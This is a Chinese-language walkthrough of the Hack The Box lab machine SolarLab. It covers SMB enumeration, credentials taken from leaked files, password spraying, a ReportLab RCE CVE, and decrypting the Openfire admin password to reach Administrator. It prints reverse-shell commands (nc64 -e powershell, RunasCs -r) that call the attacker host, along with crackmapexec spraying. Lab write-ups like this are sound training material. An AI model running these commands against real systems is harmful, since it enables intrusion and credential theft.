欢迎关注公众号 xor27
立足点
端口扫描
➜ SolarLab nmap -A -Pn -sV 10.10.11.16 -oN SolarLab.tcp
Nmap scan report for 10.10.11.16
Host is up (0.40s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Samba
└─# smbmap -H 10.10.11.16 -u " "
SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.10.11.16:445 Name: 10.10.11.16 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Documents READ ONLY
IPC$ READ ONLY Remote IPC
┌──(root㉿VM-8-3-debian)-[~]
└─#
下载文件
└─# smbclient //10.10.11.16/Documents/
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Fri Apr 26 22:47:14 2024
.. DR 0 Fri Apr 26 22:47:14 2024
concepts D 0 Fri Apr 26 22:41:57 2024
desktop.ini AHS 278 Fri Nov 17 18:54:43 2023
details-file.xlsx A 12793 Fri Nov 17 20:27:21 2023
My Music DHSrn 0 Fri Nov 17 03:36:51 2023
My Pictures DHSrn 0 Fri Nov 17 03:36:51 2023
My Videos DHSrn 0 Fri Nov 17 03:36:51 2023
old_leave_request_form.docx A 37194 Fri Nov 17 18:35:57 2023
7779839 blocks of size 4096. 1888279 blocks available
smb: \>
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget *
getting file \desktop.ini of size 278 as desktop.ini (54.3 KiloBytes/sec) (average 54.3 KiloBytes/sec)
getting file \details-file.xlsx of size 12793 as details-file.xlsx (2082.2 KiloBytes/sec) (average 1160.4 KiloBytes/sec)
getting file \old_leave_request_form.docx of size 37194 as old_leave_request_form.docx (5188.8 KiloBytes/sec) (average 2727.1 KiloBytes/sec)
getting file \concepts\Training-Request-Form.docx of size 161337 as concepts/Training-Request-Form.docx (14323.1 KiloBytes/sec) (average 7125.6 KiloBytes/sec)
getting file \concepts\Travel-Request-Sample.docx of size 30953 as concepts/Travel-Request-Sample.docx (4318.2 KiloBytes/sec) (average 6579.7 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \My Music\*
NT_STATUS_ACCESS_DENIED listing \My Pictures\*
NT_STATUS_ACCESS_DENIED listing \My Videos\*
smb: \>
details-file 是密码文件
# Username
[email protected]
KAlexander
[email protected]
blake.byte
AlexanderK
ClaudiaS
# Password
al;ksdhfewoiuh
dkjafblkjadsfgl
d398sadsknr390
ThisCanB3typedeasily1@
danenacia9234n
dadsfawe9dafkn
# email
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
拿到这么多账号密码,必须喷洒一波,可惜没成果。
80 的站点也没什么东西,尝试虚拟主机扫描和目录爆破都没有成果。于是决定全端口扫描。
全端口扫描
发现了遗漏的端口。
root@VM-8-3-debian:~# nmap -p- -Pn 10.10.11.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-17 15:07 CST
Stats: 0:03:44 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 9.02% done; ETC: 15:48 (0:37:38 remaining)
Stats: 0:07:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 46.43% done; ETC: 15:22 (0:08:09 remaining)
Nmap scan report for 10.10.11.16
Host is up (0.0017s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
6791/tcp open hnm
Nmap done: 1 IP address (1 host up) scanned in 521.38 seconds
└─# nmap -p6791 -A -sV 10.10.11.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-17 15:38 CST
Nmap scan report for 10.10.11.16
Host is up (0.0018s latency).
PORT STATE SERVICE VERSION
6791/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
使用上面的密码进行登录,发现只有 AlexanderK、ClaudiaS 两个用户存在。但尝试了所有密码都没有登录成功。
徘徊了许久,才发现 AlexanderK、ClaudiaS 其实是这两个人的名字加姓氏首字母,那就可能存在 BlakeB?
BlakeB ThisCanB3typedeasily1@ 登录成功
站点用于生成各种 PDF
这里提到了一些攻击 PDF 生成器的方式:
Hacker View — Online PDF Generators
但我们并不知道网站用的是哪种 PDF 生成器,只能来这碰运气。
CVE-2023-33733
Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.
其它都是某个 PDF 阅读器的 RCE,只有这个比较符合也比较新,值得一试。
https://github.com/c53elyas/CVE-2023-33733
提权
数据库泄漏账号密码
上线到 Sliver 方便后续工作,具体操作可以看这篇文章 Stages 部分
下载文件获得账号密码,Sliver 中直接使用 download 命令即可
blakeb ThisCanB3typedeasily1@
claudias 007poiuytrewq
alexanderk HotP!fireguard
获取本机用户
sliver (MOLECULAR_RIM) > sharpsh -- '-c Get-LocalUser'
[*] sharpsh output:
Name Enabled Description
---- ------- -----------
Administrator True
blake True
DefaultAccount False
Guest True
openfire True
WDAGUtilityAccount False
多了几个账号密码,继续尝试喷洒
➜ solarlab crackmapexec smb solarlab.htb -u users.txt -p pass.txt --continue-on-success -x whoami
SMB report.solarlab.htb 445 SOLARLAB [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB report.solarlab.htb 445 SOLARLAB [+] solarlab\openfire:HotP!fireguard
SMB report.solarlab.htb 445 SOLARLAB [+] solarlab\blake:ThisCanB3typedeasily1@
openfire
Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP Openfire is incredibly easy to setup and administer, but offers rock-solid security and performance.
横向至 openfire 用户,应该能在消息中获取更多信息。
PS C:\tmp> .\RunasCs.exe openfire HotP!fireguard "c:\tmp\nc64.exe 10.10.14.18 8888 -e powershell"
.\RunasCs.exe openfire HotP!fireguard "c:\tmp\nc64.exe 10.10.14.18 8888 -e powershell"
[*] Warning: The logon for user 'openfire' is limited. Use the flag combination --bypass-uac and --logon-type '5' to obtain a more privileged token.
[-] RunasCsException: CreateProcessWithLogonW logon type 2 failed with error code: This version of %1 is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisherPS C:\tmp>
PS C:\tmp>
上面执行失败了,使用限制模式开启 powershell
PS C:\tmp> .\RunasCs.exe openfire HotP!fireguard powershell -r 10.10.14.18:8888
.\RunasCs.exe openfire HotP!fireguard powershell -r 10.10.14.18:8888
[*] Warning: The logon for user 'openfire' is limited. Use the flag combination --bypass-uac and --logon-type '5' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-87468$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 920 created in background.
PS C:\tmp>
部署脚本泄漏密码
家目录没什么东西,但在 openfire 程序目录中发现了embedded-db/openfire.script
其中发现了 admin 密码
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','[email protected]','001700223740785','0')
......
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
破解密码
https://github.com/c0rdis/openfire_decrypt
➜ openfire_decrypt git:(master) java OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)
➜ openfire_decrypt git:(master)
获得密码 ThisPasswordShouldDo!@
PS C:\tmp> .\RunasCs.exe Administrator ThisPasswordShouldDo!@ powershell -r 10.10.14.18:9999
.\RunasCs.exe Administrator ThisPasswordShouldDo!@ powershell -r 10.10.14.18:9999
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-87468$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 3792 created in background.
PS C:\tmp>
拿下
➜ ~ nc -lvvp 9999
listening on [any] 9999 ...
connect to [10.10.14.18] from report.solarlab.htb [10.10.11.16] 52405
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\system32> whoami
whoami
solarlab\administrator
PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
3ab1......bccc
PS C:\Windows\system32>
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)